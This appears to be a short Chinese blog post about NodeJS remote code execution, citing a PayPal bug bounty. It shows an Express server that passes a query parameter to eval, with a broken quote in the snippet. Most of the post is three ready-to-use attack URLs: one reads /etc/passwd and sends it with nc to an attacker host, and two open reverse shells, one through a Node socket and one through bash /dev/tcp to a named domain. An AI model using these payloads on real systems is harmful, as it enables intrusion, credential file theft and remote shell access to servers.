首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
跟我学Nodejs(三)--- Node.js模块
May 25 NodeJs
nodejs中转换URL字符串与查询字符串详解
Nov 26 NodeJs
使用nodejs开发cli项目实例
Jun 03 NodeJs
nodejs实现获取当前url地址及url各种参数值
Jun 25 NodeJs
nodejs创建web服务器之hello world程序
Aug 20 NodeJs
浅析nodejs实现Websocket的数据接收与发送
Nov 19 NodeJs
nodejs爬虫遇到的乱码问题汇总
Apr 07 NodeJs
理解nodejs的stream和pipe机制的原理和实现
Aug 12 NodeJs
NodeJS安装图文教程
Apr 19 NodeJs
nodejs分离html文件里面的js和css的方法
Apr 09 NodeJs
nodejs对mongodb数据库的增加修删该查实例代码
Jan 05 NodeJs
node快速搭建后台的实现步骤
Feb 18 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
SeaTable(1) ACID(1) minio(1) Outlook(1) 黑屏(2) Mysql8(2) sentinel(1) Windows server 2003(1) appdata(1) celery(1)
You might like
php简单日历函数
2015/10/28 PHP
Laravel接收前端ajax传来的数据的实例代码
2017/07/20 PHP
JavaScript 程序编码规范
2010/11/23 Javascript
web性能优化之javascript性能调优
2012/12/28 Javascript
Jquery中使用setInterval和setTimeout的方法
2013/04/08 Javascript
JavaScript常用标签和方法总结
2015/09/01 Javascript
AngularJS基础 ng-model-options 指令简单示例
2016/08/02 Javascript
js 判断各种数据类型的简单方法(推荐)
2016/08/29 Javascript
JavaScript实现数值自动增加动画
2017/12/28 Javascript
vue通过指令(directives)实现点击空白处收起下拉框
2018/12/06 Javascript
ajaxfileupload.js实现上传文件功能
2019/04/19 Javascript
小程序如何自主实现拦截器的示例代码
2019/11/04 Javascript
Electron 打包问题:electron-builder 下载各种依赖出错(推荐)
2020/07/09 Javascript
vue iview 隐藏Table组件里的某一列操作
2020/11/13 Javascript
Python实现冒泡,插入,选择排序简单实例
2014/08/18 Python
详解Python中的文本处理
2015/04/11 Python
python 多线程实现检测服务器在线情况
2015/11/25 Python
Python中生成Epoch的方法
2017/04/26 Python
Python3单行定义多个变量或赋值方法
2018/07/12 Python
浅谈python的dataframe与series的创建方法
2018/11/12 Python
运用PyTorch动手搭建一个共享单车预测器
2019/08/06 Python
Python通过2种方法输出带颜色字体
2020/03/02 Python
Python实现密钥密码(加解密)实例详解
2020/04/26 Python
python 实现全球IP归属地查询工具
2020/12/18 Python
浅谈HTML5新增和废弃的标签
2019/04/28 HTML / CSS
HTML5 drag和drop具体使用详解
2021/01/18 HTML / CSS
Europcar美国/加拿大:预订汽车或卡车租赁服务
2018/11/13 全球购物
Tessabit日本:集世界奢侈品和设计师品牌的意大利精品买手店
2020/01/07 全球购物
.NET初级开发工程师面试题
2014/04/18 面试题
过程装备与控制工程专业个人的求职信
2013/12/01 职场文书
秋天的雨教学反思
2014/04/27 职场文书
2014优秀大学生简历自我评价
2014/09/15 职场文书
2014年市场部工作总结
2014/11/25 职场文书
2015年双拥工作总结
2015/04/08 职场文书
springboot 自定义配置 解决Boolean属性不生效
2022/03/18 Java/Android
python使用shell脚本创建kafka连接器
2022/04/29 Python